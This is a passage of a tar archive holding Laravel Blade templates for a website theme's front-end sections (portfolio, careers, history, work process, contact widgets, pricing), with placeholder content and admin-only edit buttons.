<h5>Paper Design</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Business Card</h5> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// My Works End //--> @if(Auth::user()) @can('gallery check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="gallery.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="gallery.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_gallery') }} </button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/career/career-style2.blade.php����������������������������������������������0000644�����������������00000037636�14765366572�0017114 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('career check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Resume Section Start //--> <section class="section pb-minus-76 bg-primary-light" id="myresume"> <div class="container"> @if(Auth::user()) @can('career check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @if (is_countable($careers_paginate_style) && count($careers_paginate_style) > 0) <div class="row"> @foreach ($careers_paginate_style as $item) <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.{{ $loop->iteration }}s"> @if(Auth::user()) @can('career check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="resume-item"> <div class="body"> @if ($item->type == "icon") @if (!empty($item->icon)) <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="{{ $item->icon }}"></span> </div> </div> @endif @else <img src="{{ asset('uploads/img/career/'.$item->section_image) }}" class="me-3 img-fluid" alt="feature image"> @endif <div class="text"> <h6>{{ $item->category_name }}</h6> <h5>{{ $item->title }}</h5> <span>{{ $item->short_description }}</span> @if (!empty($item->button_name)) <div class="btn-box"> <a href="{{ $item->button_url }}">{{ $item->button_name }} <i class="fa fa-arrow-right"></i></a> </div> @else <div class="btn-box"> <a href="{{ route('default-career-detail-show', ['career_slug' => $item->career_slug]) }}">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> @endif </div> </div> </div> </div> @endforeach @unset ($item) </div> <div class="row"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $careers_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-google"></span> </div> </div> <div class="text"> <h6>Google LLC</h6> <h5>Web Designer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-wordpress"></span> </div> </div> <div class="text"> <h6>Wordpress</h6> <h5>Web Developer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.3s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-dribbble"></span> </div> </div> <div class="text"> <h6>Dribbble</h6> <h5>UI Designer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.4s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-youtube"></span> </div> </div> <div class="text"> <h6>Youtube LLC</h6> <h5>Seo Manager</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.5s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-amazon"></span> </div> </div> <div class="text"> <h6>Amazon</h6> <h5>Sales Manager</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.6s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-behance"></span> </div> </div> <div class="text"> <h6>Behance</h6> <h5>Graphic Designer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// Resume Section End //--> @if(Auth::user()) @can('career check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_career') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������views/frontend/sections/career/career-style1.blade.php����������������������������������������������0000644�����������������00000043776�14765366572�0017115 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('career check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Resume Section Start //--> <section class="section pb-minus-76 bg-primary-light" id="myresume"> <div class="container"> @if(Auth::user()) @can('career check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($career_section_style1) <div class="row"> <div class="col-lg-6"> <div class="section-heading-left"> <span>@php echo html_entity_decode($career_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($career_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6"> <div class="section-heading-left"> <span>Career</span> <h2>Our Careers</h2> </div> </div> </div> @endif @endisset @if (is_countable($careers_style1) && count($careers_style1) > 0) <div class="row"> @foreach ($careers_style1 as $item) <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.{{ $loop->iteration }}s"> @if(Auth::user()) @can('career check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="resume-item"> <div class="body"> @if ($item->type == "icon") @if (!empty($item->icon)) <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="{{ $item->icon }}"></span> </div> </div> @endif @else <img src="{{ asset('uploads/img/career/'.$item->section_image) }}" class="me-3 img-fluid" alt="feature image"> @endif <div class="text"> <h6>{{ $item->category_name }}</h6> <h5>{{ $item->title }}</h5> <span>{{ $item->short_description }}</span> @if (!empty($item->button_name)) <div class="btn-box"> <a href="{{ $item->button_url }}">{{ $item->button_name }} <i class="fa fa-arrow-right"></i></a> </div> @else <div class="btn-box"> <a href="{{ route('default-career-detail-show', ['career_slug' => $item->career_slug]) }}">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> @endif </div> </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-google"></span> </div> </div> <div class="text"> <h6>Google LLC</h6> <h5>Web Designer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-wordpress"></span> </div> </div> <div class="text"> <h6>Wordpress</h6> <h5>Web Developer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.3s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-dribbble"></span> </div> </div> <div class="text"> <h6>Dribbble</h6> <h5>UI Designer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.4s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-youtube"></span> </div> </div> <div class="text"> <h6>Youtube LLC</h6> <h5>Seo Manager</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.5s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-amazon"></span> </div> </div> <div class="text"> <h6>Amazon</h6> <h5>Sales Manager</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.6s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-behance"></span> </div> </div> <div class="text"> <h6>Behance</h6> <h5>Graphic Designer</h5> <span>Sed volutpat pellentesque nulla ut posuere. Nunc ac felis in elit sodales porta et id arcu.</span> <div class="btn-box"> <a href="#">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> </div> </div> </div> </div> </div> @endif @endif <div class="row"> @isset ($career_section_style1) <div class="col-md-12 text-center"> <a href="{{ $career_section_style1->button_url }}" class="primary-btn"> <span class="text">{{ $career_section_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-12 text-center"> <a href="javascript:void(0)" class="primary-btn"> <span class="text">Get Started</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @endif @endisset </div> </div> </section> <!--// Resume Section End //--> @if(Auth::user()) @can('career check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="career.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_career') }} </button> </form> </div> </div> @endcan @endif ��views/frontend/sections/history/history-style1.blade.php��������������������������������������������0000644�����������������00000026131�14765366572�0017577 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// My History Start //--> <section class="section" id="my-history"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($history_section_style1) <div class="row"> <div class="col-md-6"> <div class="section-heading-left"> <span>@php echo html_entity_decode($history_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($history_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6"> <div class="section-heading-left"> <span>History</span> <h2>Our History</h2> </div> </div> </div> @endif @endisset @if (is_countable($histories_style1) && count($histories_style1) > 0) <div class="history-wrapper"> @foreach ($histories_style1 as $item) <div class="history-item"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="history.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="history-item-inner"> @if (!empty($item->section_image)) <div class="history-img"> <img src="{{ asset('uploads/img/history/'.$item->section_image) }}" alt="history image" class="img-fluid"> </div> @endif <div class="history-text"> <h2>@php echo html_entity_decode($item->title); @endphp</h2> <p>@php echo html_entity_decode($item->description); @endphp</p> </div> </div> @if (!empty($item->history_date)) <div class="history-date-wrap"> <span class="history-date"> {{ $item->history_date }} </span> </div> @endif </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="history-wrapper"> <div class="history-item"> <div class="history-item-inner"> <div class="history-img"> <img src="{{ asset('uploads/img/dummy/450x300.jpg') }}" alt="history image" class="img-fluid"> </div> <div class="history-text"> <h2>We started the industrial sector and started working in many sectors.</h2> <p> Lorem ipsum, dolor sit amet consectetur adipisicing elit. Similique iusto tempore, ipsam ad, quos repudiandae quisquam nemo quas maxime quam adipisci temporibus consequatur pariatur eaque voluptatum hic officiis ea libero? </p> </div> </div> <div class="history-date-wrap"> <span class="history-date"> 2010 </span> </div> </div> <div class="history-item"> <div class="history-item-inner"> <div class="history-img"> <img src="{{ asset('uploads/img/dummy/450x300.jpg') }}" alt="history image" class="img-fluid"> </div> <div class="history-text"> <h2>We expanded our team members and organized conferences and seminars.</h2> <p> Lorem ipsum, dolor sit amet consectetur adipisicing elit. Similique iusto tempore, ipsam ad, quos repudiandae quisquam nemo quas maxime quam adipisci temporibus consequatur pariatur eaque voluptatum hic officiis ea libero? </p> </div> </div> <div class="history-date-wrap"> <span class="history-date"> 2015 </span> </div> </div> <div class="history-item"> <div class="history-item-inner"> <div class="history-img"> <img src="{{ asset('uploads/img/dummy/450x300.jpg') }}" alt="history image" class="img-fluid"> </div> <div class="history-text"> <h2>We have the latest UI and UX designs by following all trends.</h2> <p> Lorem ipsum, dolor sit amet consectetur adipisicing elit. Similique iusto tempore, ipsam ad, quos repudiandae quisquam nemo quas maxime quam adipisci temporibus consequatur pariatur eaque voluptatum hic officiis ea libero? </p> </div> </div> <div class="history-date-wrap"> <span class="history-date"> 2024 </span> </div> </div> </div> @endif @endif </div> </section> <!--// My History End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="history.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="history.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_history') }} </button> </form> </div> </div> @endcan @endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/work_process/work-process-style1.blade.php����������������������������������0000644�����������������00000026170�14765366572�0021556 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// How I Work Section Start //--> <section class="section bg-dark-blue pb-30"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($work_process_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($work_process_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($work_process_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>How Our Work</span> <h2>Our prepare your projects in 3 stages</h2> </div> </div> </div> @endif @endisset @if (is_countable($work_processes_style1) && count($work_processes_style1) > 0) <div class="row"> @php $i = 2; $t = 1; @endphp @foreach ($work_processes_style1->chunk(3) as $work_process) <div class="row"> @foreach ($work_process as $item) <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.{{ $i + 2 }}s"> <div class="how-i-work-item"> @if (!$loop->last) <img src="{{ asset('uploads/img/dummy/bg/arrow-img.png') }}" alt="Arrrow image" class="arrow-dashed-img"> @endif <div class="number"> <span>0{{ $t++ }}</span> </div> <div class="number-border"></div> @if (!empty($item->section_image)) <div class="img"> <img src="{{ asset('uploads/img/work_process/'.$item->section_image) }}" class="img-fluid" alt="How i work"> </div> @endif <div class="text"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="work-process.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <h5>@php echo html_entity_decode($item->title); @endphp</h5> </div> </div> </div> @endforeach @unset ($item) </div> @endforeach @unset ($work_process) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.2s"> <div class="how-i-work-item"> <img src="{{ asset('uploads/img/dummy/bg/arrow-img.png') }}" alt="Arrrow image" class="arrow-dashed-img"> <div class="number"> <span>01</span> </div> <div class="number-border"></div> <div class="img"> <img src="{{ asset('uploads/img/dummy/328x328.jpg') }}" class="img-fluid" alt="How i work"> </div> <div class="text"> <h5>Thinking</h5> </div> </div> </div> <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.4s"> <div class="how-i-work-item"> <img src="{{ asset('uploads/img/dummy/bg/arrow-img.png') }}" alt="Arrrow image" class="arrow-dashed-img"> <div class="number"> <span>02</span> </div> <div class="number-border"></div> <div class="img"> <img src="{{ asset('uploads/img/dummy/328x328.jpg') }}" class="img-fluid" alt="How i work"> </div> <div class="text"> <h5>Research</h5> </div> </div> </div> <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.6s"> <div class="how-i-work-item"> <div class="number"> <span>03</span> </div> <div class="number-border"></div> <div class="img"> <img src="{{ asset('uploads/img/dummy/328x328.jpg') }}" class="img-fluid" alt="How i work"> </div> <div class="text"> <h5>Design</h5> </div> </div> </div> </div> @endif @endif </div> </section> <!--// How I Work Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="work-process.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="work-process.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_work_process') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/widget/fixed-button-style1.blade.php����������������������������������������0000644�����������������00000000531�14765366572�0020264 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('page builder check') <div class="fixed-page-builder-btn"> <a href="{{ route('page-builder.edit', $page_builder->id) }}" class="btn btn-icon page-builder-btn"> <i class="fa fa-edit text-white"></i> {{ __('content.page_builder') }} </a> </div> @endcan @endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/widget/bottom-style1.blade.php����������������������������������������������0000644�����������������00000001777�14765366572�0017175 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@isset ($bottom_button_widget) <div class="mobile-widget-container"> @if (!empty($bottom_button_widget->button_name) && $bottom_button_widget->status == 'enable') <a href="tel:{{ $bottom_button_widget->phone }}" class="btn btn-icon"> <i class="fas fa-phone-alt"></i> {{ $bottom_button_widget->button_name }} </a> @endif @if (!empty($bottom_button_widget->button_name_2) && $bottom_button_widget->status_whatsapp == 'enable') <a href="https://wa.me/{{ $bottom_button_widget->whatsapp }}" class="btn btn-icon"> <i class="fab fa-whatsapp"></i> {{ $bottom_button_widget->button_name_2 }} </a> @endif </div> @else <div class="mobile-widget-container"> <a href="tel:" class="btn btn-icon"> <i class="fas fa-phone-alt"></i> Call </a> <a href="https://wa.me/" class="btn btn-icon"> <i class="fab fa-whatsapp"></i> WhatsApp </a> </div> @endisset �views/frontend/sections/widget/side-style1.blade.php������������������������������������������������0000644�����������������00000003524�14765366572�0016605 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@isset ($side_button_widget) @if ($side_button_widget->status_phone == 'enable') <a href="tel:{{ $side_button_widget->phone }}" class="btn-whatsapp-pulse custom-color-black"> <i class="fas fa-phone"></i> </a> @endif @if ($side_button_widget->status_whatsapp == 'enable') @if ($side_button_widget->contact == "fas fa-envelope") <a href="mailto:{{ $side_button_widget->email_or_whatsapp }}" class="btn-whatsapp-pulse btn-whatsapp-pulse-border" style="@if ($side_button_widget->status_phone == 'disable') bottom:80px; @endif"> <i class="fas fa-envelope"></i> </a> @else <a href="{{ $side_button_widget->email_or_whatsapp }}" class="btn-whatsapp-pulse btn-whatsapp-pulse-border" style="@if ($side_button_widget->status_phone == 'disable') bottom:80px; @endif"> <i class="fab fa-whatsapp"></i> </a> @endif @endif @if ($side_button_widget->status == 'enable') <a href="{{ $side_button_widget->link }}" class="btn-whatsapp-pulse btn-whatsapp-pulse-border-2 custom-color-blue" style="@if ($side_button_widget->status_phone == 'disable' && $side_button_widget->status_whatsapp == 'disable') bottom:80px; @elseif ($side_button_widget->status_phone == 'disable') bottom:160px; @elseif ($side_button_widget->status_whatsapp == 'disable') bottom:160px; @endif"> <i class="{{ $side_button_widget->social_media }}"></i> </a> @endif @else <a href="#" class="btn-whatsapp-pulse custom-color-black"> <i class="fas fa-phone"></i> </a> <a href="#" class="btn-whatsapp-pulse btn-whatsapp-pulse-border"> <i class="fab fa-whatsapp"></i> </a> <a href="#" class="btn-whatsapp-pulse btn-whatsapp-pulse-border-2 custom-color-blue"> <i class="fab fa-facebook"></i> </a> @endisset ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/plan/plan-style1.blade.php��������������������������������������������������0000644�����������������00000046661�14765366572�0016273 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Pricing Section Start //--> <section class="section bg-primary-light" id="team"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset($plan_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($plan_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($plan_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>Pricing</span> <h2>Our Pricing</h2> </div> </div> </div> @endif @endisset @if (is_countable($plans_style1) && count($plans_style1) > 0) <div class="row"> @foreach ($plans_style1 as $plan) @if ($plan->recommended == 'no') <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="plan.edit"> <input type="hidden" name="single_id" value="{{ $plan->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="pricing-card"> <div class="price-text"> <h5>{{ $plan->currency }}{{ $plan->price }}</h5> </div> <div class="body"> <div class="pricing-text"> <h5>{{ $plan->name }}</h5> @if (!empty($plan->tag)) <div> <span 